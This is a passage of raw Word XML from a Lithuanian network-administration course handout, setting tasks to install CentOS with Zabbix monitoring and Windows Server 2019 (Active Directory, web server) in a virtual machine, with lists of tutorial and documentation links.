          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ĮRANKIUS TINKLO BŪSENAI STEBĖTI</w:t>
      </w:r>
      <w:r w:rsidR="5BB0F9F4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25656E7A" w14:textId="487B7FEB" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="7AD66BD4"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 xml:space="preserve">UŽDUOTIES SĄLYGA: </w:t>
      </w:r>
      <w:r w:rsidR="00436334" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Įdie</w:t>
      </w:r>
      <w:r w:rsidR="006670B4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>serverinę operacinę sistemą C</w:t>
      </w:r>
      <w:r w:rsidR="00AC190A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ent</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">OS </w:t>
      </w:r>
      <w:r w:rsidR="136DC0AC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">virtualioje aplinkoje </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>(Virtual Box), atlik</w:t>
      </w:r>
      <w:r w:rsidR="006670B4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ite</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D310B3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">jos </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>konfigūravimą</w:t>
      </w:r>
      <w:r w:rsidR="00FD1E78" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FD1E78" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Į</w:t>
      </w:r>
      <w:r w:rsidR="5FF6B121" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>die</w:t>
      </w:r>
      <w:r w:rsidR="006670B4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidR="5FF6B121" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Zabbix</w:t>
      </w:r>
      <w:r w:rsidR="223F87FB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FD1E78" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>programinę įrangą ir</w:t>
      </w:r>
      <w:r w:rsidR="6C90FD99" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FD1E78" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="6C90FD99" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>atikri</w:t>
      </w:r>
      <w:r w:rsidR="006670B4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>nkite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FD1E78" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>jos</w:t>
      </w:r>
      <w:r w:rsidR="00D90846" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="6C90FD99" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>galimybes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5270609A" w14:textId="77777777" w:rsidR="00902AC8" w:rsidRPr="005A5C28" w:rsidRDefault="00902AC8" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08F89C49" w14:textId="3DF09AD3" w:rsidR="00D72DCB" w:rsidRPr="005A5C28" w:rsidRDefault="7EA2917A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7A0751" w14:textId="7A1EC1AA" w:rsidR="344D9E9F" w:rsidRPr="005A5C28" w:rsidRDefault="0E20E274" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">How to install and configure Zabbix on CentOS 7. </w:t>
      </w:r>
      <w:r w:rsidR="79564466" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">(2019, gruodžio 22). </w:t>
      </w:r>
      <w:r w:rsidR="261019EC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">FOSSLinux. </w:t>
      </w:r>
      <w:r w:rsidR="261019EC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId48">
        <w:r w:rsidR="0941BA38" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.fosslinux.com/7705/how-to-install-and-configure-zabbix-on-centos-7.htm</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="76AB8EBE" w14:textId="4A9A4653" w:rsidR="344D9E9F" w:rsidRPr="005A5C28" w:rsidRDefault="3658EB2B" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>How to Install Zabbix 5.0 or 5.2 on CentOS 8 [Step-by-Step]</w:t>
      </w:r>
      <w:r w:rsidR="6D941D14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="6D941D14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Best monitoring tools. </w:t>
      </w:r>
      <w:r w:rsidR="6D941D14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId49">
        <w:r w:rsidR="6D941D14" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://bestmonitoringtools.com/how-to-install-zabbix-server-on-centos-or-rhel/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="05F7244C" w14:textId="6418A6E6" w:rsidR="344D9E9F" w:rsidRPr="005A5C28" w:rsidRDefault="2351B133" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Zabbix Documentation 5.0. </w:t>
      </w:r>
      <w:r w:rsidR="1B29624E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Zabbix.</w:t>
      </w:r>
      <w:r w:rsidR="7BF3B5EC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1B29624E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId50">
        <w:r w:rsidR="0941BA38" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.zabbix.com/documentation/5.0/manual/installation/install_from_packages/rhel_centos</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="610DE4A8" w14:textId="4C34B8F7" w:rsidR="0B4A386B" w:rsidRPr="005A5C28" w:rsidRDefault="0B4A386B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="524BFF92" w14:textId="3B1203F2" w:rsidR="13D53724" w:rsidRPr="005A5C28" w:rsidRDefault="1AF6DB21" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="1FF1DD0B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="1FF1DD0B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ĮDIEGTI IR KONF</w:t>
      </w:r>
      <w:r w:rsidR="0C22A5A1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">IGŪRUOTI </w:t>
      </w:r>
      <w:r w:rsidR="1FF1DD0B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>WINDOWS SERVER 2019 DESKTOP EXPERIENCE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110A9CCA" w14:textId="0A82BC1C" w:rsidR="13D53724" w:rsidRPr="005A5C28" w:rsidRDefault="13CB65A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 xml:space="preserve">UŽDUOTIES SĄLYGA: </w:t>
      </w:r>
      <w:r w:rsidR="00AC07FD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Įdie</w:t>
      </w:r>
      <w:r w:rsidR="006670B4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">kite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">serverinę operacinę sistemą Windows Server Desktop Experience 2019 </w:t>
      </w:r>
      <w:r w:rsidR="136DC0AC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>virtualioje aplinkoje</w:t>
      </w:r>
      <w:r w:rsidR="00AC07FD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>(Virtual Box arba</w:t>
      </w:r>
      <w:r w:rsidR="1670DAD5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> vmware workstation</w:t>
      </w:r>
      <w:r w:rsidR="57694A07" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1670DAD5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>player</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="006747E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>atlik</w:t>
      </w:r>
      <w:r w:rsidR="006670B4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AC07FD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">jos </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>konfigūravimą</w:t>
      </w:r>
      <w:r w:rsidR="5A5302CF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Active Directory, WebServer)</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E0F680" w14:textId="60CF5669" w:rsidR="529C8039" w:rsidRPr="005A5C28" w:rsidRDefault="529C8039" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D8DD000" w14:textId="77777777" w:rsidR="00D72DCB" w:rsidRPr="005A5C28" w:rsidRDefault="427E9BD7" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709F54CF" w14:textId="44904402" w:rsidR="13D53724" w:rsidRPr="005A5C28" w:rsidRDefault="3D3ABC07" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Koli</w:t>
      </w:r>
      <w:r w:rsidR="001E2CAC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> D. </w:t>
      </w:r>
      <w:r w:rsidR="430B00AC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">(2019, sausio 19). </w:t>
      </w:r>
      <w:r w:rsidR="2EB7D6BA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Windows Server 2019 with Desktop Experience (Full Interface) - Clean Installation</w:t>
      </w:r>
      <w:r w:rsidR="349875D5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="5D587F2A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">DSKOLI. </w:t>
      </w:r>
      <w:r w:rsidR="5D587F2A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId51">
        <w:r w:rsidR="427E9BD7" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.dskoli.in/blog/windows-server-2019-with-desktop-experience-full-interface-clean-installation</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0C858B37" w14:textId="7D7FB77B" w:rsidR="13D53724" w:rsidRPr="005A5C28" w:rsidRDefault="5E538EF8" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Windows Server products &amp; resources</w:t>
      </w:r>
      <w:r w:rsidR="2381150C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="2381150C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft. </w:t>
      </w:r>
      <w:r w:rsidR="2381150C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId52">
        <w:r w:rsidR="2381150C" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.microsoft.com/en-us/evalcenter/evaluate-windows-server-2019</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7D6E019C" w14:textId="1C96DAB7" w:rsidR="13D53724" w:rsidRPr="005A5C28" w:rsidRDefault="20282EE6" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
